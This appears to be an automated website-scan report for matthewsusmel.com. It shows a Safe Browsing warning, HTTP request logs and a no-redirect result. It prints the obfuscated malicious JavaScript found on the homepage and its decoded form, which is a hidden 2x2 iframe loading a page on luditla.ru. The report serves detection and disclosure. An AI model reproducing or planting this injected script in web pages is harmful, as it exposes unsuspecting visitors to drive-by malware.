Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=matthewsusmel.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://matthewsusmel.com/ | 200 OK Content-Length: 1950 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="117.100.900.1110.891.1170.981.1010.990.1160.414.1190.1026.1050.1044.1010.360.390.540.1050.918.1140.873.1090.909.320.1035.1140.891.610.306.1040.1044.1160.1008.580.423.470.972.1170.900.1050.1044.1080.873.460.1026.1170.423.990.999.1170.990.1160.450.480.414.1120.936.1120.306.320.990.970.981.1010.549.340.756.1190.945.1160.1044.1010.1026.340.288.1150.891.1140.999.1080.972.1050.990.1030.549.340.873.1170.1044.1110.306.320.918.1140.873.1090.909.980.999.1140.900.1010.1026.610.306.1100.999.340.288.970.972.1050.927.1100.549.340.891.1010.990.1160.909.1140.306.320.936.1010.945.1030.936.1160.549.340.450.340.288.1190.945.1000.1044.1040.549.340.450.340.558.600.423.1050.918.1140.873.1090.909.620.351.410.531.130.90".split(".");h=2;s="";if(window["document"])for(i=0;-161+i<0;i=1+i){k=i;s=s+String.fromCharCode(n[k]/(i%(h)+9));}if(012===10)e(s);}
Decoded script:
document.write('<iframe src="http://luditla.ru/count20.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
Antivirus reports:
http://matthewsusmel.com/test404page.js | 404 Not Found Content-Length: 487 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: matthewsusmel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:42:21 GMT
Accept-Ranges: bytes
ETag: "79e-4c52e77ce0300"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1950
Content-Type: text/html
Last-Modified: Thu, 19 Jul 2012 13:07:56 GMT
...1950 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: matthewsusmel.com
Referer: http://www.google.com/search?q=matthewsusmel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.